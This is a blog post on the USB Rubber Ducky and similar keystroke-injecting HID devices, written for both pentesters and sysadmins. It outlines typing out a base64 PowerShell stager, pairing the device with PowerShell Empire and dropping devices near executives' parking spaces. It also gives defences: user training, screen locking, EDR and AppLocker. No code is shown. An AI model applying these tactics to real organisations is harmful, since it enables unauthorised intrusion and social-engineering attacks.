The USB Threat is [Still] Real — Pentest Tools for Sysadmins, Continued
This is a continuation of my post “Five Pentest Tools and Techniques (That Every Sysadmin Should Know)”. If you haven’t gotten the chance to check it out, go do it! I’ll be waiting for you when you get back.
Preface
For those unfamiliar, the USB Rubber Ducky is a product available by Hak5, who sells a variety of tools and gadgets for the aspiring pentester. What makes it so great is that the Ducky, which looks exactly like a USB thumb drive, actually contains a programmable Human Interface Device (HID) which can simulate a pre-programmed series of keystrokes. Beyond the Rubber Ducky, the Teensy board has similar capabilities, but in a less friendly, or well, non-existent package.
USB HID class peripherals are not the same as USB mass storage media.
For The Pentesters
Re-examining the idea of initial infection vector, some of the more tedious of challenges during an internal pentest are getting a Remote Access Trojan (RAT) on the machine to begin with. Many organizations use some form of endpoint protection software which locks down the ability to freely connect a mass storage device or forces device encryption, and therefore blocks potentially malicious files from being transferred to the machine. Kudos to those of you that do this, by the way.
What about HIDs? Computers recognize mass storage devices and HID devices differently, since HID is associated with input devices (like keyboards). Many times organizations do not consider this.
Next, let’s also remember that a program is essentially just code that was typed out, compiled, and ran. What if, rather than copying a file to the disk, we could just type it out and run it? What if instead of writing out the code and compiling it we could simply decode a base64 encoded malware stager, which is a feature that just so happens to be built into PowerShell? There are a lot of possibilities. Check out PowerShell Empire, which comes with support for the Ducky out-of-the-box.
If you are a pentester, or aspiring to become one, know that time during testing is of the essence. The pressure is on as soon as you step into the office. Save yourself some time, and keep a programmable HID in your bag.
For The Sysadmins
A study by the University of Illinois indicated that USB devices found by users would get connected roughly half of the time (48%) before users opened stored files on them. Applying this knowledge now, imagine if a device could be programmed to perform the malicious actions without user intervention post-connection? For some additional reading, check out this Naked Security by Sophos article on the subject. Fascinating stuff.
If you run IT at your organization, think about your facility. You more than likely have a large parking lot out front or in back, or maybe a parking garage that may be publicly accessible. If your company became a target, what would stop someone from dropping something that resembled a USB device conveniently around the parking spaces with the “Reserved for Chief Financial Officer, XYZ Securities” sign posted in front of them? Humans are instinctively curious. What if that device said “PRIVATE” across it?
The point is, the USB threat is bigger than just mass storage media, but the mitigation is a bit more difficult than others (well, maybe not a wholesale whitelisting deployment).
Actually, I would dare say that this is the most difficult direct mitigation in the “Pentesting Tools” list, and that is end-user training.
Ensure this happens at least once a year for all employees. Remind everyone that they must lock their computers when unattended, as HIDs can only work in the way described when the user is logged on. For executives, make it business focused. Remind them that they may become the target of a whale phishing campaign or corporate espionage, and to be wary of connecting anything foreign into the network. I know it can be especially difficult to tell executives they can’t or shouldn’t do something, but try to word it appropriately.
Sure, one could go as far as to say “disable your USB ports”, but there is more to a blanket suggestion like that than meets the eye. At this time, a recommendation like that would be very difficult to scale for most organizations, and many actually do require the use of their front facing USBs for legitimate business purposes. If disabling USB access to workstations at a hardware level is somehow feasible at your organization, without a doubt, do it!
What is important is that you be aware that just because you have one piece of software that performs some action against USB mass media devices, it may not be taking other USB classified device types, such as HIDs, into account.
In addition to annual user training, take a defense-in-depth approach to your endpoint security. Do not just rely on only one technology to defend yourself from foreign USB devices, or the payloads they may hold. Leveraging antivirus in conjunction with other endpoint protections such as application whitelisting and Endpoint Detection and Response (EDR) software is always preferred. Lock down unnecessary applications with Applocker, such as PowerShell, for the user base. Human Resources and the receptionist aren’t using it for anything anyway.
Just some (more) food for thought.
